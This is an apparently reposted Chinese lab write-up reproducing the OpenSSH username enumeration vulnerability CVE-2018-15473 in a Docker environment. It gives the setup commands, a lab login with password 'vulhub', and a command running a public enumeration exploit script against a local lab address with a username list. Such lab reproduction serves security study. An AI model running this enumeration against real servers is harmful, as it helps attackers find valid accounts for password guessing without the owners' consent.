OpenSSH 用户名枚举漏洞（CVE-2018-15473）

OpenSSH 7.7前存在一个用户名枚举漏洞，通过该漏洞，攻击者可以判断某个用户名是否存在于目标主机中。

漏洞环境

执行如下命令，编译及启动一个运行OpenSSH 7.7p1的容器：

docker-compose build
docker-compose up -d

环境启动后，我们在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@172.168.30.190 -p20022，输入密码vulhub，即可登录到容器中。

使用CVE-2018-15473-Exploit，枚举字典中的用户名：

python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt 172.168.30.190

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 OpenSSH 用户名枚举漏洞（CVE-2018-15473）漏洞分析：OpenSSH用户枚举漏洞（CVE-2018-15473）分析 SSH用户枚举漏洞（CVE-2018-15473）原理学习 SSH用户枚举漏洞（CVE-2018-15473）原理学习漏洞复现-CVE-2018-15473-ssh用户枚举漏洞 openssh用户枚举漏洞复现 burpsuite Intruder功能枚举用户名和口令 CVE-2019-18988 teamviewer将用户名密码硬编码至注册表中如何修改Oracle的用户名正则验证用户名